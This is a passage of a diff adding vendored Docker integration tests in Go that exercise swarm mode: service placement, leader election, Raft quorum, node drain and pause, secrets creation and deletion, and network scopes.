+	time.Sleep(250 * time.Millisecond)
+	tasks = daemons[0].getServiceTasks(c, id)
+	// validate tasks are not assigned
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+	// make nodes[1] fulfills the constraints
+	daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) {
+		n.Spec.Annotations.Labels = map[string]string{
+			"security": "high",
+		}
+	})
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].getServiceTasks(c, id)
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, nodes[1].ID)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	testRequires(c, DaemonIsLinux)
+
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept
+
+	instances := 9
+	d1.createService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+	getContainers := func() map[string]*SwarmDaemon {
+		m := make(map[string]*SwarmDaemon)
+		for _, d := range []*SwarmDaemon{d1, d2, d3} {
+			for _, id := range d.activeContainers() {
+				m[id] = d
+			}
+		}
+		return m
+	}
+
+	containers := getContainers()
+	c.Assert(containers, checker.HasLen, instances)
+	var toRemove string
+	for i := range containers {
+		toRemove = i
+	}
+
+	_, err := containers[toRemove].Cmd("stop", toRemove)
+	c.Assert(err, checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+	containers2 := getContainers()
+	c.Assert(containers2, checker.HasLen, instances)
+	for i := range containers {
+		if i == toRemove {
+			c.Assert(containers2[i], checker.IsNil)
+		} else {
+			c.Assert(containers2[i], checker.NotNil)
+		}
+	}
+
+	containers = containers2
+	for i := range containers {
+		toRemove = i
+	}
+
+	// try with killing process outside of docker
+	pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove)
+	c.Assert(err, checker.IsNil)
+	pid, err := strconv.Atoi(strings.TrimSpace(pidStr))
+	c.Assert(err, checker.IsNil)
+	c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil)
+
+	time.Sleep(time.Second) // give some time to handle the signal
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+	containers2 = getContainers()
+	c.Assert(containers2, checker.HasLen, instances)
+	for i := range containers {
+		if i == toRemove {
+			c.Assert(containers2[i], checker.IsNil)
+		} else {
+			c.Assert(containers2[i], checker.NotNil)
+		}
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) {
+	// add three managers, one of these is leader
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
+
+	// start a service by hitting each of the 3 managers
+	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+		s.Spec.Name = "test1"
+	})
+	d2.createService(c, simpleTestService, func(s *swarm.Service) {
+		s.Spec.Name = "test2"
+	})
+	d3.createService(c, simpleTestService, func(s *swarm.Service) {
+		s.Spec.Name = "test3"
+	})
+
+	// 3 services should be started now, because the requests were proxied to leader
+	// query each node and make sure it returns 3 services
+	for _, d := range []*SwarmDaemon{d1, d2, d3} {
+		services := d.listServices(c)
+		c.Assert(services, checker.HasLen, 3)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) {
+	// Create 3 nodes
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
+
+	// assert that the first node we made is the leader, and the other two are followers
+	c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True)
+	c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False)
+	c.Assert(d1.getNode(c, d3.NodeID).ManagerStatus.Leader, checker.False)
+
+	d1.Stop() // stop the leader
+
+	var (
+		leader    *SwarmDaemon   // keep track of leader
+		followers []*SwarmDaemon // keep track of followers
+	)
+	checkLeader := func(nodes ...*SwarmDaemon) checkF {
+		return func(c *check.C) (interface{}, check.CommentInterface) {
+			// clear these out before each run
+			leader = nil
+			followers = nil
+			for _, d := range nodes {
+				if d.getNode(c, d.NodeID).ManagerStatus.Leader {
+					leader = d
+				} else {
+					followers = append(followers, d)
+				}
+			}
+
+			if leader == nil {
+				return false, check.Commentf("no leader elected")
+			}
+
+			return true, check.Commentf("elected %v", leader.id)
+		}
+	}
+
+	// wait for an election to occur
+	waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d2, d3), checker.True)
+
+	// assert that we have a new leader
+	c.Assert(leader, checker.NotNil)
+
+	// Keep track of the current leader, since we want that to be chosen.
+	stableleader := leader
+
+	// add the d1, the initial leader, back
+	d1.Start()
+
+	// TODO(stevvooe): may need to wait for rejoin here
+
+	// wait for possible election
+	waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d1, d2, d3), checker.True)
+	// pick out the leader and the followers again
+
+	// verify that we still only have 1 leader and 2 followers
+	c.Assert(leader, checker.NotNil)
+	c.Assert(followers, checker.HasLen, 2)
+	// and that after we added d1 back, the leader hasn't changed
+	c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
+
+	d1.createService(c, simpleTestService)
+
+	c.Assert(d2.Stop(), checker.IsNil)
+
+	// make sure there is a leader
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+
+	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+		s.Spec.Name = "top1"
+	})
+
+	c.Assert(d3.Stop(), checker.IsNil)
+
+	// make sure there is a leader
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+
+	var service swarm.Service
+	simpleTestService(&service)
+	service.Spec.Name = "top2"
+	status, out, err := d1.SockRequest("POST", "/services/create", service.Spec)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out)))
+
+	c.Assert(d2.Start(), checker.IsNil)
+
+	// make sure there is a leader
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+
+	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+		s.Spec.Name = "top3"
+	})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	nodes := d1.listNodes(c)
+	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
+
+loop0:
+	for _, n := range nodes {
+		for _, d := range []*SwarmDaemon{d1, d2, d3} {
+			if n.ID == d.NodeID {
+				continue loop0
+			}
+		}
+		c.Errorf("unknown nodeID %v", n.ID)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	nodes := d.listNodes(c)
+
+	d.updateNode(c, nodes[0].ID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityPause
+	})
+
+	n := d.getNode(c, nodes[0].ID)
+	c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) {
+	testRequires(c, Network)
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	_ = s.AddDaemon(c, true, false)
+
+	nodes := d1.listNodes(c)
+	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
+
+	// Getting the info so we can take the NodeID
+	d2Info, err := d2.info()
+	c.Assert(err, checker.IsNil)
+
+	// forceful removal of d2 should work
+	d1.removeNode(c, d2Info.NodeID, true)
+
+	nodes = d1.listNodes(c)
+	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
+
+	// Restart the node that was removed
+	err = d2.Restart()
+	c.Assert(err, checker.IsNil)
+
+	// Give some time for the node to rejoin
+	time.Sleep(1 * time.Second)
+
+	// Make sure the node didn't rejoin
+	nodes = d1.listNodes(c)
+	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
+
+	// start a service, expect balanced distribution
+	instances := 8
+	id := d1.createService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
+
+	// drain d2, all containers should move to d1
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityDrain
+	})
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0)
+
+	// set d2 back to active
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityActive
+	})
+
+	instances = 1
+	d1.updateService(c, d1.getService(c, id), setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
+
+	instances = 8
+	d1.updateService(c, d1.getService(c, id), setInstances(instances))
+
+	// drained node first so we don't get any old containers
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
+
+	d2ContainerCount := len(d2.activeContainers())
+
+	// set d2 to paused, scale service up, only d1 gets new tasks
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityPause
+	})
+
+	instances = 14
+	d1.updateService(c, d1.getService(c, id), setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances-d2ContainerCount)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount)
+
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	instances := 2
+	d.createService(c, simpleTestService, setInstances(instances))
+
+	id, err := d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	id = strings.TrimSpace(id)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1)
+
+	c.Assert(d.Leave(false), checker.NotNil)
+	c.Assert(d.Leave(true), checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	id2, err := d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2))
+}
+
+// #23629
+func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) {
+	testRequires(c, Network)
+	s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, false, false)
+
+	id, err := d2.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	id = strings.TrimSpace(id)
+
+	err = d2.Join(swarm.JoinRequest{
+		RemoteAddrs: []string{"123.123.123.123:1234"},
+	})
+	c.Assert(err, check.NotNil)
+	c.Assert(err.Error(), checker.Contains, "Timeout was reached")
+
+	info, err := d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending)
+
+	c.Assert(d2.Leave(true), checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1)
+
+	id2, err := d2.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2))
+}
+
+// #23705
+func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) {
+	testRequires(c, Network)
+	d := s.AddDaemon(c, false, false)
+	err := d.Join(swarm.JoinRequest{
+		RemoteAddrs: []string{"123.123.123.123:1234"},
+	})
+	c.Assert(err, check.NotNil)
+	c.Assert(err.Error(), checker.Contains, "Timeout was reached")
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending)
+
+	c.Assert(d.Stop(), checker.IsNil)
+	c.Assert(d.Start(), checker.IsNil)
+
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d1.createService(c, simpleTestService, setInstances(instances))
+
+	d1.getService(c, id)
+	d1.Stop()
+	d1.Start()
+	d1.getService(c, id)
+
+	d2 := s.AddDaemon(c, true, true)
+	d2.getService(c, id)
+	d2.Stop()
+	d2.Start()
+	d2.getService(c, id)
+
+	d3 := s.AddDaemon(c, true, true)
+	d3.getService(c, id)
+	d3.Stop()
+	d3.Start()
+	d3.getService(c, id)
+
+	d3.Kill()
+	time.Sleep(1 * time.Second) // time to handle signal
+	d3.Start()
+	d3.getService(c, id)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d.createService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+	containers := d.activeContainers()
+	instances = 4
+	d.updateService(c, d.getService(c, id), setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+	containers2 := d.activeContainers()
+
+loop0:
+	for _, c1 := range containers {
+		for _, c2 := range containers2 {
+			if c1 == c2 {
+				continue loop0
+			}
+		}
+		c.Errorf("container %v not found in new set %#v", c1, containers2)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+	req := swarm.InitRequest{
+		ListenAddr: "",
+	}
+	status, _, err := d.SockRequest("POST", "/swarm/init", req)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+
+	req2 := swarm.JoinRequest{
+		ListenAddr:  "0.0.0.0:2377",
+		RemoteAddrs: []string{""},
+	}
+	status, _, err = d.SockRequest("POST", "/swarm/join", req2)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d1.createService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
+
+	// drain d2, all containers should move to d1
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityDrain
+	})
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0)
+
+	c.Assert(d2.Stop(), checker.IsNil)
+
+	c.Assert(d1.Init(swarm.InitRequest{
+		ForceNewCluster: true,
+		Spec:            swarm.Spec{},
+	}), checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
+
+	d3 := s.AddDaemon(c, true, true)
+	info, err := d3.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.True)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	instances = 4
+	d3.updateService(c, d3.getService(c, id), setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+}
+
+func simpleTestService(s *swarm.Service) {
+	ureplicas := uint64(1)
+	restartDelay := time.Duration(100 * time.Millisecond)
+
+	s.Spec = swarm.ServiceSpec{
+		TaskTemplate: swarm.TaskSpec{
+			ContainerSpec: swarm.ContainerSpec{
+				Image:   "busybox:latest",
+				Command: []string{"/bin/top"},
+			},
+			RestartPolicy: &swarm.RestartPolicy{
+				Delay: &restartDelay,
+			},
+		},
+		Mode: swarm.ServiceMode{
+			Replicated: &swarm.ReplicatedService{
+				Replicas: &ureplicas,
+			},
+		},
+	}
+	s.Spec.Name = "top"
+}
+
+func serviceForUpdate(s *swarm.Service) {
+	ureplicas := uint64(1)
+	restartDelay := time.Duration(100 * time.Millisecond)
+
+	s.Spec = swarm.ServiceSpec{
+		TaskTemplate: swarm.TaskSpec{
+			ContainerSpec: swarm.ContainerSpec{
+				Image:   "busybox:latest",
+				Command: []string{"/bin/top"},
+			},
+			RestartPolicy: &swarm.RestartPolicy{
+				Delay: &restartDelay,
+			},
+		},
+		Mode: swarm.ServiceMode{
+			Replicated: &swarm.ReplicatedService{
+				Replicas: &ureplicas,
+			},
+		},
+		UpdateConfig: &swarm.UpdateConfig{
+			Parallelism:   2,
+			Delay:         4 * time.Second,
+			FailureAction: swarm.UpdateFailureActionContinue,
+		},
+	}
+	s.Spec.Name = "updatetest"
+}
+
+func setInstances(replicas int) serviceConstructor {
+	ureplicas := uint64(replicas)
+	return func(s *swarm.Service) {
+		s.Spec.Mode = swarm.ServiceMode{
+			Replicated: &swarm.ReplicatedService{
+				Replicas: &ureplicas,
+			},
+		}
+	}
+}
+
+func setImage(image string) serviceConstructor {
+	return func(s *swarm.Service) {
+		s.Spec.TaskTemplate.ContainerSpec.Image = image
+	}
+}
+
+func setFailureAction(failureAction string) serviceConstructor {
+	return func(s *swarm.Service) {
+		s.Spec.UpdateConfig.FailureAction = failureAction
+	}
+}
+
+func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor {
+	return func(s *swarm.Service) {
+		s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio
+	}
+}
+
+func setParallelism(parallelism uint64) serviceConstructor {
+	return func(s *swarm.Service) {
+		s.Spec.UpdateConfig.Parallelism = parallelism
+	}
+}
+
+func setConstraints(constraints []string) serviceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.TaskTemplate.Placement == nil {
+			s.Spec.TaskTemplate.Placement = &swarm.Placement{}
+		}
+		s.Spec.TaskTemplate.Placement.Constraints = constraints
+	}
+}
+
+func setGlobalMode(s *swarm.Service) {
+	s.Spec.Mode = swarm.ServiceMode{
+		Global: &swarm.GlobalService{},
+	}
+}
+
+func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) {
+	var totalMCount, totalWCount int
+
+	for _, d := range cl {
+		var (
+			info swarm.Info
+			err  error
+		)
+
+		// check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error
+		checkInfo := func(c *check.C) (interface{}, check.CommentInterface) {
+			info, err = d.info()
+			return err, check.Commentf("cluster not ready in time")
+		}
+		waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil)
+		if !info.ControlAvailable {
+			totalWCount++
+			continue
+		}
+
+		var leaderFound bool
+		totalMCount++
+		var mCount, wCount int
+
+		for _, n := range d.listNodes(c) {
+			waitReady := func(c *check.C) (interface{}, check.CommentInterface) {
+				if n.Status.State == swarm.NodeStateReady {
+					return true, nil
+				}
+				nn := d.getNode(c, n.ID)
+				n = *nn
+				return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID)
+			}
+			waitAndAssert(c, defaultReconciliationTimeout, waitReady, checker.True)
+
+			waitActive := func(c *check.C) (interface{}, check.CommentInterface) {
+				if n.Spec.Availability == swarm.NodeAvailabilityActive {
+					return true, nil
+				}
+				nn := d.getNode(c, n.ID)
+				n = *nn
+				return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID)
+			}
+			waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True)
+
+			if n.Spec.Role == swarm.NodeRoleManager {
+				c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.Info.NodeID))
+				if n.ManagerStatus.Leader {
+					leaderFound = true
+				}
+				mCount++
+			} else {
+				c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID))
+				wCount++
+			}
+		}
+		c.Assert(leaderFound, checker.True, check.Commentf("lack of leader reported by node %s", info.NodeID))
+		c.Assert(mCount, checker.Equals, managerCount, check.Commentf("managers count reported by node %s", info.NodeID))
+		c.Assert(wCount, checker.Equals, workerCount, check.Commentf("workers count reported by node %s", info.NodeID))
+	}
+	c.Assert(totalMCount, checker.Equals, managerCount)
+	c.Assert(totalWCount, checker.Equals, workerCount)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) {
+	mCount, wCount := 5, 1
+
+	var nodes []*SwarmDaemon
+	for i := 0; i < mCount; i++ {
+		manager := s.AddDaemon(c, true, true)
+		info, err := manager.info()
+		c.Assert(err, checker.IsNil)
+		c.Assert(info.ControlAvailable, checker.True)
+		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+		nodes = append(nodes, manager)
+	}
+
+	for i := 0; i < wCount; i++ {
+		worker := s.AddDaemon(c, true, false)
+		info, err := worker.info()
+		c.Assert(err, checker.IsNil)
+		c.Assert(info.ControlAvailable, checker.False)
+		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+		nodes = append(nodes, worker)
+	}
+
+	// stop whole cluster
+	{
+		var wg sync.WaitGroup
+		wg.Add(len(nodes))
+		errs := make(chan error, len(nodes))
+
+		for _, d := range nodes {
+			go func(daemon *SwarmDaemon) {
+				defer wg.Done()
+				if err := daemon.Stop(); err != nil {
+					errs <- err
+				}
+				if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+					daemon.root = filepath.Dir(daemon.root)
+				}
+			}(d)
+		}
+		wg.Wait()
+		close(errs)
+		for err := range errs {
+			c.Assert(err, check.IsNil)
+		}
+	}
+
+	// start whole cluster
+	{
+		var wg sync.WaitGroup
+		wg.Add(len(nodes))
+		errs := make(chan error, len(nodes))
+
+		for _, d := range nodes {
+			go func(daemon *SwarmDaemon) {
+				defer wg.Done()
+				if err := daemon.Start("--iptables=false"); err != nil {
+					errs <- err
+				}
+			}(d)
+		}
+		wg.Wait()
+		close(errs)
+		for err := range errs {
+			c.Assert(err, check.IsNil)
+		}
+	}
+
+	checkClusterHealth(c, nodes, mCount, wCount)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d.createService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+
+	service := d.getService(c, id)
+	instances = 5
+
+	setInstances(instances)(service)
+	url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index)
+	status, out, err := d.SockRequest("POST", url, service.Spec)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	secrets := d.listSecrets(c)
+	c.Assert(secrets, checker.NotNil)
+	c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	secrets := d.listSecrets(c)
+	c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets))
+	name := secrets[0].Spec.Annotations.Name
+	c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	secret := d.getSecret(c, id)
+	c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret))
+
+	d.deleteSecret(c, secret.ID)
+	status, out, err := d.SockRequest("GET", "/secrets/"+id, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out)))
+}
+
+// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`,
+// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`.
+// This test makes sure the fixes correctly output scopes instead.
+func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "foo"
+	networkCreateRequest := types.NetworkCreateRequest{
+		Name: name,
+		NetworkCreate: types.NetworkCreate{
+			CheckDuplicate: false,
+		},
+	}
+
+	var n1 types.NetworkCreateResponse
+	networkCreateRequest.NetworkCreate.Driver = "bridge"
+
+	status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out)))
+
+	c.Assert(json.Unmarshal(out, &n1), checker.IsNil)
+
+	var n2 types.NetworkCreateResponse
+	networkCreateRequest.NetworkCreate.Driver = "overlay"
+
+	status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out)))
+
+	c.Assert(json.Unmarshal(out, &n2), checker.IsNil)
+
+	var r1 types.NetworkResource
+
+	status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out)))
+
+	c.Assert(json.Unmarshal(out, &r1), checker.IsNil)
+
+	c.Assert(r1.Scope, checker.Equals, "local")
+
+	var r2 types.NetworkResource
+
+	status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out)))
+
+	c.Assert(json.Unmarshal(out, &r2), checker.IsNil)
+
+	c.Assert(r2.Scope, checker.Equals, "swarm")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go
new file mode 100644
index 0000000000..3b38ba96f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go
@@ -0,0 +1,118 @@
+package main
+
+import (
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"runtime"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) {
+	status, _, err := sockRequest("OPTIONS", "/", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+}
